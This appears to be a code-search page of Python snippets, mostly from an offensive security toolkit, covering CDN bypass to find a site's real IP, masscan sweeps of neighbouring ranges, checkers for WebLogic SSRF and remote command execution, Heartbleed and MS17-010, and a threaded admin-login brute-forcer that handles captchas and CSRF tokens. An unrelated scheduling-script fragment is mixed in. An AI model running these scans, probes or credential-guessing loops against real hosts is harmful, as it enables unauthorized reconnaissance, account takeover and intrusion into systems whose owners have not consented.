示例#1
 def check_if_mx_c_machines_has_actual_ip_of_domain(self):
     """Search the C-class ranges around the domain's MX hosts for its real IP.

     Every address returned by ``get_ip_from_mx_record`` is passed to
     ``check_if_ip_c_machines_has_actual_ip_of_domain``. The first result
     that is not 0 is returned; 0 is returned when no candidate matched.
     """
     CLIOutput().good_print("尝试从mx记录的c段中查找是否存在%s的真实ip" % self.domain)
     for mx_ip in self.get_ip_from_mx_record():
         hit = self.check_if_ip_c_machines_has_actual_ip_of_domain(mx_ip)
         if hit != 0:
             return hit
     return 0
示例#2
文件: xcdn.py 项目: 3xp10it/xcdn
 def get_actual_ip_from_domain(self):
     """Try to find the real IP behind a domain that sits behind a CDN.

     Returns the IP when one of the lookups below succeeds, otherwise 0.
     When ``domain_has_cdn`` reports no CDN, the first address from
     ``socket.gethostbyname_ex`` is returned without further checks.
     """
     CLIOutput().good_print("进入获取真实ip函数,认为每个domain都是有cdn的情况来处理")
     import socket

     cdn_info = self.domain_has_cdn()
     if cdn_info['has_cdn'] != 1:
         CLIOutput().good_print(
             "Attention...!!! Domain doesn't have cdn,I will return the only one ip"
         )
         return socket.gethostbyname_ex(self.domain)[2][0]

     CLIOutput().good_print("检测到domain:%s的A记录不止一个,认为它有cdn" %
                            self.domain)

     # Source 1: the online Cloudflare lookup, used only for Cloudflare domains.
     if cdn_info['is_cloud_flare'] == 1:
         cloudflare_ip = self.get_ip_value_from_online_cloudflare_interface()
         if cloudflare_ip != 0:
             return cloudflare_ip

     # Source 2: a phpinfo page, if the site exposes one.
     phpinfo_ip = self.get_domain_actual_ip_from_phpinfo()
     if phpinfo_ip != 0:
         return phpinfo_ip

     # Source 3: hosts in the C-class ranges of the MX records.
     mx_ip = self.check_if_mx_c_machines_has_actual_ip_of_domain()
     if mx_ip != 0:
         return mx_ip

     print("很遗憾,在下认为%s有cdn,但是目前在下的能力没能获取它的真实ip,当前函数将返回0" % self.domain)
     return 0
示例#3
文件: xcdn.py 项目: 3xp10it/xcdn
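 def get_c_80_or_443_list(self, ip):
     """Return the addresses masscan reports for port 80 or 443 in ``ip``'s /24.

     The port follows ``self.http_or_https``: "http" selects 80 and "https"
     selects 443. masscan's standard output is parsed directly, so the
     fixed, world-predictable ``/tmp/masscan.out`` file is no longer written.

     Args:
         ip: dotted IPv4 address whose /24 is scanned.

     Returns:
         List of IPv4 address strings found in masscan's output.

     Raises:
         ValueError: if ``ip`` is not a literal IPv4 address, or if
             ``self.http_or_https`` is neither "http" nor "https".
     """
     import ipaddress
     import re
     import subprocess

     # ip ends up on a command line; accept nothing but a literal address so
     # shell metacharacters or extra options cannot ride along with it.
     ip = str(ipaddress.IPv4Address(ip))

     if self.http_or_https == "http":
         scanPort = 80
     elif self.http_or_https == "https":
         scanPort = 443
     else:
         # Previously scanPort stayed unbound here and failed later with
         # UnboundLocalError.
         raise ValueError("http_or_https must be 'http' or 'https'")

     if "not found" in get_string_from_command("masscan"):
         # masscan is used because the author found nmap's results inaccurate.
         os.system("apt-get install masscan")

     CLIOutput().good_print("现在进行%s的c段开了%d端口机器的扫描" % (ip, scanPort))

     try:
         # Argument list, no shell: nothing in ip or the port is interpreted.
         scan = subprocess.run(
             ["masscan", "-p%d" % scanPort, "%s/24" % ip],
             stdout=subprocess.PIPE,
             universal_newlines=True,
         )
         strings = scan.stdout
     except OSError as err:
         # masscan still missing: behave like an empty scan result.
         print("masscan could not be started: %s" % err)
         strings = ""

     ipList = re.findall(r"(?:\d{1,3}\.){3}\d{1,3}", strings)
     print(ipList)
     return ipList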
示例#4
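def check(url):
    """Request ``url + check_addr`` and record a hit if the body shows 127.0.0.1.

    On a 200 response the body is decoded and searched for ``127.0.0.1``.
    A match is printed and appended to ``result.txt`` in ``current_dir``.
    Any other status code is printed. Returns None in every case.
    """
    vuln_url = url + check_addr

    # NOTE(review): verify=False disables TLS certificate validation, so the
    # response is not authenticated; results seen through an intercepting
    # proxy may not come from the intended host.
    rsp = requests.get(vuln_url, verify=False, timeout=10)
    if rsp.status_code != 200:
        # The original printed content.status_code here, but content is
        # only bound on the 200 path, so this branch raised NameError.
        print(rsp.status_code)
        return

    import chardet
    raw = rsp.content
    # chardet reports None when it cannot guess; fall back to UTF-8 and
    # replace undecodable bytes instead of raising on a bad guess.
    bytes_encoding = chardet.detect(raw)['encoding'] or "utf-8"
    content = raw.decode(bytes_encoding, errors="replace")
    # NOTE(review): a bare 127.0.0.1 anywhere in the page counts as a hit,
    # so unrelated pages can match; treat results as leads to confirm.
    if re.search(r"127\.0\.0\.1", content, re.I):
        string_to_write = "Congratulations! uddiexplorer/SearchPublicRegistries漏洞存在:\n" + vuln_url + "\n"
        CLIOutput().good_print(string_to_write)
        with open("%s/result.txt" % current_dir, "a+") as f:
            f.write(string_to_write)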
示例#5
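 def check_if_ip_is_actual_ip_of_domain(self, ip):
     """Check whether ``ip`` serves the same site as ``self.domain``.

     /etc/hosts is temporarily rewritten so the domain resolves to ``ip``,
     the page is fetched, and its title is compared with
     ``self.domain_title``. The hosts file is restored even if the fetch
     fails.

     Returns:
         True when the titles match, False otherwise.
     """
     import shutil

     CLIOutput().good_print(
         "现在通过修改hosts文件并刷新dns的方法检测ip:%s是否是domain:%s的真实ip" %
         (ip, self.domain))
     # Fail loudly if the backup cannot be made; going on without one would
     # leave nothing to restore from.
     shutil.copy2("/etc/hosts", "/etc/hosts.bak")
     try:
         self.modify_hosts_file_with_ip_and_domain(ip)
         self.flush_dns()
         hosts_changed_domain_title = get_request(
             self.http_or_https + "://%s" % self.domain,
             'seleniumPhantomJS')['title']
     finally:
         # One rename instead of "rm && mv": the system never sits without
         # a hosts file, and an exception above can no longer leave the
         # modified hosts file in place.
         os.replace("/etc/hosts.bak", "/etc/hosts")
     # Compare titles, not full HTML; equal titles count as the same site.
     if self.domain_title == hosts_changed_domain_title:
         print("是的!!!!!!!!!!!!")
         return True
     else:
         print("不是的!!!!!!!!!!!!")
         return False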
示例#6
def check(url):
    """Probe ``url + check_addr`` and look for a marker in the POST reply.

    A GET is sent first. Unless it answers 200, its status code is printed
    and nothing else happens. Otherwise ``post_str`` is POSTed with
    ``heads``, the reply is decoded with the encoding chardet detects, and
    a ``java.lang.ProcessBuilder`` match is printed and appended to
    ``result.txt`` in ``current_dir``.
    """
    vuln_url = url + check_addr

    # Both requests run with verify=False, i.e. without TLS certificate checks.
    probe = requests.get(vuln_url, verify=False, timeout=10)
    if probe.status_code != 200:
        print(probe.status_code)
        return

    reply = requests.post(
        vuln_url,
        headers=heads,
        data=post_str.encode("utf-8"),
        verify=False,
        timeout=10,
    )
    import chardet
    body = reply.content
    body = body.decode(chardet.detect(body)['encoding'])

    if not re.search(r"java\.lang\.ProcessBuilder", body, re.I):
        print("失败")
        return

    string_to_write = "Congratulations! weblogic 远程命令执行漏洞存在:\n" + url + shell_addr + "\n"
    CLIOutput().good_print(string_to_write)
    with open("%s/result.txt" % current_dir, "a+") as f:
        f.write(string_to_write)
示例#7
from exp10it import COMMON_NOT_WEB_PORT_LIST
from exp10it import get_http_domain_from_url
from exp10it import get_target_open_port_list

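# Runs ssltest.py against every open port of the target that is not in
# COMMON_NOT_WEB_PORT_LIST and appends positive results to result.txt.
import shlex

current_dir = os.path.split(os.path.realpath(__file__))[0]
target = sys.argv[1]
print("checking heartbleed vul for " + target)
# The original fetched the port list twice; the first result was never used.
open_port_list = get_target_open_port_list(target)
http_domain = get_http_domain_from_url(target)
parsed = urlparse(target)
hostname = parsed.hostname
target_table_name = get_target_table_name_list(target)[0]

if not hostname:
    # Without a scheme urlparse yields no hostname; the literal "None"
    # used to be handed to ssltest.py in that case.
    sys.exit("no host name could be parsed from %r" % target)

# parsed.port copes with userinfo and IPv6 literals, which the former
# netloc.split(":")[1] turned into a bogus "port" string.
try:
    explicit_port = parsed.port
except ValueError:
    explicit_port = None
if explicit_port is not None:
    open_port_list.append(str(explicit_port))

for each in open_port_list:
    if each not in COMMON_NOT_WEB_PORT_LIST:
        # Everything interpolated into the shell string is quoted so a crafted
        # target cannot add commands; benign values pass through unchanged.
        a = get_string_from_command(
            "cd %s && python2 ssltest.py -p %s %s " %
            (shlex.quote(current_dir), shlex.quote(str(each)),
             shlex.quote(hostname)))
        if re.search(r"server is vulnerable", a, re.I):
            string_to_write = "Congratulations! heartbleed vul exists on %s:%s" % (
                hostname, each)
            CLIOutput().good_print(string_to_write)
            with open("%s/result.txt" % current_dir, "a+") as f:
                # Newline added so consecutive findings do not run together.
                f.write(string_to_write + "\n")
        else:
            # NOTE(review): this message is printed for every port that did
            # not test vulnerable; its wording looks like it belongs to a
            # different branch. Confirm the intended condition.
            print(
                "coz I found no nmap scan result from database,I will not run heartbleed vul check module on other ports"
            )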
示例#8
import re
import os
import sys
exp10it_module_path = os.path.expanduser("~") + "/exp10it"
sys.path.insert(0, exp10it_module_path)
import time
from urllib.parse import urlparse
from exp10it import CLIOutput
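# Runs nmap's smb-vuln-ms17-010 script against the target and keeps the scan
# output as result.txt when it reports VULNERABLE.
import subprocess

target = sys.argv[1]
print("checking ms17-010 vul for " + target)
current_dir = os.path.split(os.path.realpath(__file__))[0]
if target[:4] == "http":
    target = urlparse(target).hostname
if not target or target.startswith("-"):
    # An empty host or one that looks like an option must never reach nmap.
    sys.exit("refusing to scan: %r is not a usable host name" % target)

nse_path = os.path.join(current_dir, "smb-vuln-ms17-010.nse")
if not os.path.exists(nse_path):
    # NOTE(review): the script is fetched from the tip of the master branch
    # with no pinned revision and no checksum, then executed by nmap. Pin a
    # commit and verify a digest, or ship the script with the tool.
    subprocess.call(
        ["wget",
         "https://raw.githubusercontent.com/cldrn/nmap-nse-scripts/master/scripts/smb-vuln-ms17-010.nse"],
        cwd=current_dir)

# Argument list instead of a shell string, so the target is never shell-parsed.
# Output is captured in memory, replacing the predictable /tmp/commix_<time>
# log file that another local user could pre-create or symlink.
try:
    proc = subprocess.Popen(
        ["nmap", "--script=%s" % nse_path, target],
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        universal_newlines=True)
except OSError as err:
    sys.exit("could not start nmap: %s" % err)

captured = []
for line in proc.stdout:
    # Echo while collecting, as the former "| tee" did.
    sys.stdout.write(line)
    captured.append(line)
proc.wait()
log_str = "".join(captured)

# NOTE(review): a case-insensitive search for VULNERABLE also matches text
# such as "not vulnerable"; confirm against the script's real output format.
if re.search(r"VULNERABLE", log_str, re.I):
    with open(os.path.join(current_dir, "result.txt"), "w") as f:
        f.write(log_str)
    # The message used to say MS10-010, but this check is for MS17-010.
    CLIOutput().good_print("Congratulations! MS17-010 exists on %s" % target)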
示例#9
                                printString="["+startTime+"-"+endTime+" 正在进行:"+each[2]+"]"
                                t=MyThread(output.continue_bottom_print,(printString,))
                                t.start()
                                hasPrintStatusTimeZoneList.append(todayDate+":"+startTime+"-"+endTime)

                        if endTime == now:
                            if todayDate+"'"+now not in saidNowEndList:
                                os.system("say '注意,现在结束%s'" % each[2])
                                #output.bottom_print("\r"+" "*len(printString))
                                output.bottom_print("[完成'%s']" % each[2])
                                #sys.stdout.flush()
                                output.stop_order=1
                                saidNowEndList.append(todayDate+"'"+now)


# Console writer shared by the code below.
output = CLIOutput()

# Candidate rewards and penalties (the names are pinyin); one index into each
# list is drawn at random at start-up.
jiangli = [
    "今日dj",
    "本周2次dj",
    "可以买一个礼物给家人",
    "可以买一本好书给自己",
    "可以获得一次抵消惩罚的机会",
    "明天完成main后可以自由娱乐或其他安排",
    "周末可以自由安排",
    "增加可购买想要的东西的基金200元",
]
chengfa = [
    "周末Ndj",
    "周末全部时间用来学习,禁止娱乐",
    "周末全部时间用来练习五笔",
    "周末全部时间用来背单词",
    "周末背2000个单词后才可以休息, 否则不能进行任意娱乐",
    "减少基金200元",
]
jiangliIndex = random.randrange(len(jiangli))
chengfaIndex = random.randrange(len(chengfa))

while 1:
    import time
    nowYear = time.strftime("%y")
    nowMonth = time.strftime("%m")
    nowDate = time.strftime("%d")
    todayDate = nowYear + nowMonth + nowDate

    choose = input('''请输入你遇到的问题:
    1.效率不高
示例#10
    def crack_admin_login_url_thread(url,username,password):
        """Submit one username/password pair to the login form and judge the reply.

        This is a nested worker: nearly everything it touches (``get_flag``,
        ``try_time``, ``form_action_url``, ``s``, ``sum``, ...) comes from the
        enclosing scope, which is not visible here. The one-element lists
        appear to serve as mutable cells shared between workers - TODO confirm
        against the enclosing function.

        Returns immediately when ``get_flag[0]`` is already 1. On what it
        treats as success (response longer than ``logined_least_length``) it
        sets ``get_flag[0]``, stores a summary in ``return_string[0]`` and
        returns ``{'username': ..., 'password': ...}``. No other return is
        visible in this excerpt.
        """
        # Another worker already reported success: do nothing.
        if get_flag[0] == 1:
            return


        try_time[0] += 1
        if requestAction=="GET":
            # GET: swap the credential values into the query string of the
            # recorded form URL.
            final_request_url=form_action_url
            final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" %
                    (user_form_name,username),final_request_url)
            final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" %
                    (pass_form_name,password),final_request_url)
            if has_yanzhengma[0]:
                # "yanzhengma" is pinyin for captcha: reuse the single known
                # value or obtain a fresh one from yanzhengma_src.
                if needOnlyGetOneYanZhengMa:
                    yanzhengmaValue=onlyOneYanZhengMaValue
                else:
                    yanzhengmaValue=get_one_valid_yangzhengma_from_src(yanzhengma_src)

                final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" %
                        (yanzhengma_form_name,yanzhengmaValue),final_request_url)
                if hasCsrfToken:
                    final_request_url=re.sub(r"%s=[^&]*" % csrfTokenName,currentCsrfTokenPart[0],final_request_url)

            html=s.get(final_request_url).text

            if hasCsrfToken:
                # Keep the token taken from this response for the next request.
                csrfTokenValue=get_csrf_token_value_from_html(html)
                currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
        else:
            #post request
            # form_action_url has the shape "<url>^<name=value&...>"; the part
            # after "^" is parsed into the POST fields.
            paramPartValue=form_action_url.split("^")[1]
            paramList=paramPartValue.split("&")
            values={}
            for eachP in paramList:
                eachPList=eachP.split("=")
                eachparamName=eachPList[0]
                eachparamValue=eachPList[1]
                if eachparamName==user_form_name:
                    eachparamValue=username
                if eachparamName==pass_form_name:
                    eachparamValue=password
                values[eachparamName]=eachparamValue

            if has_yanzhengma[0]:
                if not needOnlyGetOneYanZhengMa:
                    values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src)
                else:
                    values[yanzhengma_form_name]=onlyOneYanZhengMaValue

            if hasCsrfToken:
                # currentCsrfTokenPart[0] holds "name=value"; only the value is sent.
                values[csrfTokenName]=re.search(r"[^=]+=(.*)",currentCsrfTokenPart[0]).group(1)

            html = s.post(form_action_url.split("^")[0], values).text

            if hasCsrfToken:
                csrfTokenValue=get_csrf_token_value_from_html(html)
                currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue

        # NOTE(review): the attempted username and password are written to
        # stdout in clear text on every call (progress line below).
        USERNAME_PASSWORD = "******" + username + ":" + \
                password + ")" + (52 - len(password)) * " "
        # The average completion speed is recomputed every 100 attempts.

        left_time = get_remain_time(
                start[0],
                biaoji_time[0],
                remain_time[0],
                100,
                try_time[0],
                sum[0])
        remain_time[0] = left_time

        # sum here is a list from the enclosing scope (it shadows the builtin);
        # sum[0] is used as the total number of attempts.
        sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) +
                '%' + ' %s/%s  remain time:%s  %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD))

        sys.stdout.flush()


        # Success is inferred from response length alone.
        if len(html) > logined_least_length:
            # Treated as a successful login.
            get_flag[0] = 1
            end = time.time()
            CLIOutput().good_print(
                    "congratulations!!! admin login url cracked succeed!!!", "red")
            string = "cracked admin login url:%s username and password:(%s:%s)" % (
                    url, username, password)
            CLIOutput().good_print(string, "red")
            return_string[0]=string
            print("you spend time:" + str(end - start[0]))
            http_domain_value = get_http_domain_from_url(url)
            # Verified: terminate() apparently ends only the current thread and
            # cannot stop all threads.
            table_name_list = get_target_table_name_list(http_domain_value)
            urls_table_name = http_domain_value.split(
                    "/")[-1].replace(".", "_") + "_urls"

            return {'username': username, 'password': password}